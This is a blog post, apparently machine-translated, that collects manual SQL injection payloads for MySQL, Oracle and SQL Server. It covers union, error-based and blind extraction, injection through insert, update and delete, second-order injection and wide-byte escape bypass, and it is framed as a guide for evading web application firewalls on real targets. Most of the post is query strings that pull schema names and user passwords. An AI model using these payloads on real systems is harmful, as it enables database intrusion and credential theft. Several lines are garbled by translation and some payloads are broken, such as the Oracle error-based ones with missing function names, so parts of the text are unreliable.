Summary of manual SQL injection

Although there are many artifacts about sql Injection on the Internet, in this era of WAF, manual injection is often particularly important in some real environments. This article mainly talks about the knowledge learned before. Please correct the deficiencies.

0x01 Mysql manual injection

1.1 combined injection

?id=1' order by 4--+?id=0' union select 1,2,3,database()--+?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+?id=0' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="users" --+#group_concat(column_name)   Can be replaced by   unhex(Hex(cast(column_name+as+char)))column_name
?id=0' union select 1,2,3,group_concat(password) from users --+#group_concat   Can be replaced by   concat_ws(',',id,users,password  )
?id=0' union select 1,2,3,password from users limit 0,1--+

1.2 error reporting

1.floor()select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2.extractvalue()select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5.multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6.polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7.multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8.linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9.multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10.exp()select * from test where id=1 and exp(~(select * from(select user())a));

Each error reporting statement has its principle:

Principle of exp() error reporting: exp is a mathematical function. Take the x power of e. when the value we enter is greater than 709, an error will be reported, and then ~ take the opposite value, it will always be greater than 709, so an error will be reported.

Principle of updatexml() error reporting: since the second parameter of updatexml requires an Xpath format string, the content starting with ~ is not xml format syntax, and the concat() function is a string connection function, which obviously does not comply with the rules, but the execution results in parentheses will be reported in the form of errors, so that error reporting injection can be realized.

Blasting Silo:?id=1' and updatexml(1,(select concat(0x7e,(schema_name),0x7e) from information_schema.schemata limit 2,1),1) -- +Burst table:?id=1' and updatexml(1,(select concat(0x7e,(table_name),0x7e) from information_schema.tables where table_schema='security' limit 3,1),1) -- +Explosion field:?id=1' and updatexml(1,(select concat(0x7e,(column_name),0x7e) from information_schema.columns where table_name=0x7573657273 limit 2,1),1) -- +Explosion data:?id=1' and updatexml(1,(select concat(0x7e,password,0x7e) from users limit 1,1),1) -- +
#concat   You can also put it outside   updatexml(1,concat(0x7e,(select   password   from   users   limit   1,1),0x7e),1)

It should be noted here that it adds connection characters, resulting in only 31 bits of md5 in the data. Here, it can be divided by the segmentation function:

substr(string string,num start,num length);#String is the string, start is the starting position, and length is the length
?id=1' and updatexml(1,concat(0x7e, substr((select password from users limit 1,1),1,16),0x7e),1) -- +

1.3 blind injection

1.3.1 time blind injection

Time blind injection is also called delay injection. Generally, the function sleep() BENCHMARK() can also use Cartesian product (try not to use it. Too much content will be very slow)

In general, we also need to use conditional judgment function

#if (expre1, expre2, expre3) when expre1 is true, expre2 is returned; when false, expre3 is returned
#Blind annotation is also combined with the segmentation functions substr, substring and left provided by mysql

We generally like to encode the split functions. Of course, it's OK not to encode them. The advantage of coding is that you can use no quotation marks. Commonly used functions include ascii() hex(), etc

?id=1' and if(ascii(substr(database(),1,1))>115,1,sleep(5))--+?id=1' and if((substr((select user()),1,1)='r'),sleep(5),1)--+

1.3.2 Boolean blind injection

?id=1' and substr((select user()),1,1)='r' -- +?id=1' and IFNULL((substr((select user()),1,1)='r'),0) -- +#If   IFNULL   The expression for the first parameter is   Null, the alternate value of the second parameter is returned, not Null   Null   Output value
?id=1' and strcmp((substr((select user()),1,1)='r'),1) -- +#If all strings are the same, STRCMP()   return   0. If the first parameter is less than the second according to the current classification order, it returns  - one  , Return in other cases   one

1.4 insert,delete,update

Insert, delete and update mainly use blind injection and error reporting injection. sqlmap and other tools are not recommended for such injection points, which will cause a large amount of garbage data. Generally, this injection will appear in the places where data needs to be written, such as registration, ip header and message board. At the same time, it is difficult to find that this injection does not report an error. We can try to insert, quote, double quote, escape character \ let The statement cannot execute normally, and then if the insertion fails, the update fails, and then an in-depth test is conducted to determine whether there is an injection

1.4.1 error reporting


mysql> insert into admin (id,username,password) values (2,"or updatexml(1,concat(0x7e,(version())),0) or","admin");Query OK, 1 row affected (0.00 sec)
mysql> select * from admin;+------+-----------------------------------------------+----------+| id   | username                                      | password |+------+-----------------------------------------------+----------+|    1 | admin                                         | admin    ||    1 | and 1=1                                       | admin    ||    2 | or updatexml(1,concat(0x7e,(version())),0) or | admin    |+------+-----------------------------------------------+----------+3 rows in set (0.00 sec)
mysql> insert into admin (id,username,password) values (2,""or updatexml(1,concat(0x7e,(version())),0) or"","admin");ERROR 1105 (HY000): XPATH syntax error: '~5.5.53'
#delete   Injection is very dangerous, very dangerous, very dangerous. Remember not to use it   or   1=1  , or   The right side must be false MySQL >   delete   from   admin   where   id  =- two   or   updatexml(1,concat(0x7e,(version())),0);ERROR 1105 (HY000): XPATH syntax error: '~5.5.53'

1.4.2 blind injection


#Operators such as addition, subtraction, multiplication, division and or XOR shift can be used for int type MySQL >   insert   into   admin   values   (2+if((substr((select   user()),1,1)='r'),sleep(5),1),'1',"admin");Query OK, 1 row affected (5.00 sec)
mysql> insert into admin values (2+if((substr((select user()),1,1)='p'),sleep(5),1),'1',"admin");Query OK, 1 row affected (0.00 sec)
#Note that the character type cannot be closed with andmysql >   insert   into   admin   values   (2,''+if((substr((select   user()),1,1)='p'),sleep(5),1)+'',"admin");Query OK, 1 row affected (0.00 sec)
mysql> insert into admin values (2,''+if((substr((select user()),1,1)='r'),sleep(5),1)+'',"admin");Query OK, 1 row affected (5.01 sec)
# The right side of the delete function or must be false MySQL >   delete   from   admin   where   id  =- two   or   if((substr((select   user()),1,1)='r4'),sleep(5),0);Query OK, 0 rows affected (0.00 sec)
mysql> delete from admin where id =-2 or if((substr((select user()),1,1)='r'),sleep(5),0);Query OK, 0 rows affected (5.00 sec)
#Update update data content MySQL > select * from admin; + ------ + ---------------- + ---------------- + | ID | username | password | + ------ + ---------------- + ---------- + | 2 | 1 | admin | 2 | 1 | admin | 2 | 2 | admin | 2 | admin | admin | + ------ + ---------- + ---------- + ---------------- + 4 rows in set (0.00 sec)
mysql> update admin set id="5"+sleep(5)+"" where id=2;Query OK, 4 rows affected (20.00 sec)Rows matched: 4  Changed: 4  Warnings: 0

1.5 secondary injection and wide byte injection

Secondary injection statement: under the sql statement not wrapped in single quotation marks, we can encode it in hexadecimal, so that it will not contain single quotation marks, etc

mysql> insert into admin (id,name,pass) values ('3',0x61646d696e272d2d2b,'11');Query OK, 1 row affected (0.00 sec)
mysql> select * from admin;+----+-----------+-------+| id | name      | pass  |+----+-----------+-------+|  1 | admin     | admin ||  2 | admin'111 | 11111 ||  3 | admin'--+ | 11    |+----+-----------+-------+4 rows in set (0.00 sec)

Secondary injection is difficult to find when there is no source code. It is usually seen in registration. After logging in to a malicious account, the database may mistake admin '-- + for admin account due to the problem of malicious account name

Wide byte injection: some protection is made for the target, and the single quotation mark is transformed into  \' , mysql will  \  Code as  % 5c  , Two bytes in the wide byte represent a Chinese character, so  % df   add  % 5c   It becomes a Chinese character "Yun". Using this method to successfully bypass the escape is the so-called wide byte injection

id=-1%df' union select...
#Wide bytes not used -% 27 - >% 5C% 27
#Use wide byte% DF% 27 - >% DF% 5C% 27 - > Run '

0x02 Oracle manual injection

2.1 combined injection

?id=-1' union select user,null from dual--?id=-1' union select version,null from v$instance--?id=-1' union select table_name,null from (select * from (select rownum as limit,table_name from user_tables) where limit=3)--?id=-1' union select column_name,null from (select * from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=2)--?id=-1' union select username,passwd from users--?id=-1' union select username,passwd from (select * from (select username,passwd,rownum as limit from users) where limit=3)--

2.2 error reporting

?id=1' and,(select user from dual))--?id=1' and,(select banner from v$version where banner like 'Oracle%))--?id=1' and,(select table_name from (select rownum as limit,table_name from user_tables) where limit= 3))--?id=1' and,(select column_name from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=3))--?id=1' and,(select passwd from (select passwd,rownum as limit from users) where limit=1))--

2.3 blind injection

2.3.1 Boolean blind injection

Since it is a blind note, it must involve conditional judgment statements. Oracle can also use the decode() function in addition to the complex IF the else end if.
Syntax: decode (condition, value 1, return value 1, value 2, return value 2,... Value n, return value n, default value);

The meaning of this function is as follows:

IF condition=Value 1 THEN    RETURN(Return value 1)ELSIF condition=Value 2 THEN    RETURN(Return value 2)    ......ELSIF condition=value n THEN    RETURN(Return value n)ELSE    RETURN(Default value)END IF​​​​​​
?id=1' and 1=(select decode(user,'SYSTEM',1,0,0) from dual)--?id=1' and 1=(select decode(substr(user,1,1),'S',1,0,0) from dual)--?id=1' and ascii(substr(user,1,1))> 64--  #dichotomy

2.3.2 time blind injection

The DBMS_PIPE.RECEIVE_MESSAGE('Any value ', delay time) function can be used for time blind injection. This function can specify the delay time

?id=1' and 1=(case when ascii(substr(user,1,1))> 128 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--?id=1' and 1=(case when ascii(substr(user,1,1))> 64 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--

0x03 SQL server manual injection

3.1 combined injection

?id=-1' union select null,null--?id=-1' union select @@servername, @@version--?id=-1' union select db_name(),suser_sname()--?id=-1' union select (select top 1 name from sys.databases where name not in (select top 6 name from sys.databases)),null--?id=-1' union select (select top 1 name from sys.databases where name not in (select top 7 name from sys.databasesl),null--?id--1' union select (select top 1 table_ name from information_schema.tables where table_name not in (select top 0 table_name from information_schema.tables)),null--?id=-1' union select (select top 1 column name from information_schema.columns where table_name='users' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'users')),null---?id=-1' union select (select top 1 username from users where username not in (select top 3 username from users)),null--

3.2 error reporting

?id=1' and 1=(select 1/@@servername)--?id=1' and 1=(select 1/(select top 1 name from sys.databases where name not in (select top 1 name from sys.databases))--

3.3 blind injection

3.3.1 Boolean blind injection

?id=1' and ascii(substring((select db_ name(1)),1,1))> 64--

3.3.2 time blind injection

?id= 1';if(2>1) waitfor delay '0:0:5'--?id= 1';if(ASCII(SUBSTRING((select db_name(1)),1,1))> 64) waitfor delay

Tags: Database SQL

Posted on Thu, 11 Nov 2021 00:29:27 -0500 by engkeb0i